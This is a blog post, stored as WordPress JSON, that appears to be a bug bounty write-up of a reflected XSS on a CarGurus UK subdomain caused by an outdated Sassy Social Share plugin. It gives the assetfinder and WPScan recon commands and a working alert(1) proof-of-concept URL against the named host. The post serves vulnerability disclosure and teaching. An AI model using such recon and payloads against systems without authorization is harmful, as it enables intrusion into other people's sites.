{"id":204,"date":"2023-08-19T22:01:00","date_gmt":"2023-08-19T15:01:00","guid":{"rendered":"https:\/\/n45ht.or.id\/blog\/?p=204"},"modified":"2025-01-16T00:06:47","modified_gmt":"2025-01-15T17:06:47","slug":"finding-wordpress-vulnerabilities-on-cargurus-with-wpscan","status":"publish","type":"post","link":"https:\/\/n45ht.or.id\/blog\/finding-wordpress-vulnerabilities-on-cargurus-with-wpscan\/","title":{"rendered":"Finding WordPress Vulnerabilities on CarGurus with WPScan"},"content":{"rendered":"\n<p>While exploring CarGurus&#8217; bug bounty program, I discovered a <strong>reflected XSS vulnerability<\/strong> on their subdomain <code>dealercentre.cargurus.co.uk<\/code>. This writeup details the steps I took to identify and exploit the vulnerability using WordPress enumeration tools and a known vulnerable plugin.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Subdomain Enumeration<\/h4>\n\n\n\n<p>CarGurus&#8217; bug bounty program accepts reports for subdomains of <code>cargurus.co.uk<\/code>. To begin my reconnaissance, I used <strong>Assetfinder<\/strong> to enumerate subdomains.<\/p>\n\n\n\n<p>Command:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"assetfinder --subs-only cargurus.co.uk\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #88C0D0\">assetfinder<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">--subs-only<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">cargurus.co.uk<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Result:<br>I identified the subdomain <code>dealercentre.cargurus.co.uk<\/code>, which was running WordPress.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Scanning for WordPress Vulnerabilities<\/h4>\n\n\n\n<p>To identify potential vulnerabilities, I used <strong>WPScan<\/strong>, a popular WordPress security scanner.<\/p>\n\n\n\n<p>Command:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"wpscan --url https:\/\/dealercentre.cargurus.co.uk\/ --enumerate vp,vt --api-token [token]\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #88C0D0\">wpscan<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">--url<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">https:\/\/dealercentre.cargurus.co.uk\/<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">--enumerate<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">vp,vt<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">--api-token<\/span><span style=\"color: #D8DEE9FF\"> [token]<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>--enumerate vp,vt<\/code>:\n<ul class=\"wp-block-list\">\n<li><code>vp<\/code>: Enumerate vulnerable plugins.<\/li>\n\n\n\n<li><code>vt<\/code>: Enumerate vulnerable themes.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">Discovery of Vulnerable Plugin<\/h4>\n\n\n\n<p>WPScan revealed that the website was using an <strong>outdated version of the Sassy Social Share plugin<\/strong>, which is known to be vulnerable to Reflected Cross-Site Scripting (XSS).<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>WPScan Reference:<br><a href=\"https:\/\/wpscan.com\/vulnerability\/99f4fb32-e312-4059-adaf-f4cbaa92d4fa\/\">https:\/\/wpscan.com\/vulnerability\/99f4fb32-e312-4059-adaf-f4cbaa92d4fa\/<\/a><\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"790\" height=\"344\" src=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/cargurus-bbp.png\" alt=\"\" class=\"wp-image-205\" style=\"width:504px;height:auto\" srcset=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/cargurus-bbp.png 790w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/cargurus-bbp-300x131.png 300w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/cargurus-bbp-768x334.png 768w\" sizes=\"auto, (max-width: 790px) 100vw, 790px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Exploiting the Vulnerability<\/h3>\n\n\n\n<p>Using the Proof of Concept (PoC) provided on WPScan, I tested the reflected XSS on the following URL:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"HTML\" class=\"language-HTML\">https:\/\/dealercentre.cargurus.co.uk\/blog\/april-2023-uk-vehicle-availability-index\/?a&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;\/script&amp;gt;<\/code><\/pre>\n\n\n\n<p>When this URL is accessed, the payload executes, resulting in an alert box appearing in the browser.<\/p>\n\n\n\n<p>#HappyHacking<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>While exploring CarGurus&#8217; bug bounty program, I discovered a reflected XSS vulnerability on their subdomain dealercentre.cargurus.co.uk. This writeup details the steps I took to identify and exploit the vulnerability using WordPress enumeration tools and a known vulnerable plugin. Subdomain Enumeration CarGurus&#8217; bug bounty program accepts reports for subdomains of cargurus.co.uk. To begin my reconnaissance, I [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":206,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[23,9,8],"class_list":["post-204","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-research","tag-bug-bounty","tag-cross-site-scripting","tag-xss"],"_links":{"self":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/204","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/comments?post=204"}],"version-history":[{"count":2,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/204\/revisions"}],"predecessor-version":[{"id":242,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/204\/revisions\/242"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media\/206"}],"wp:attachment":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media?parent=204"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/categories?post=204"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/tags?post=204"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}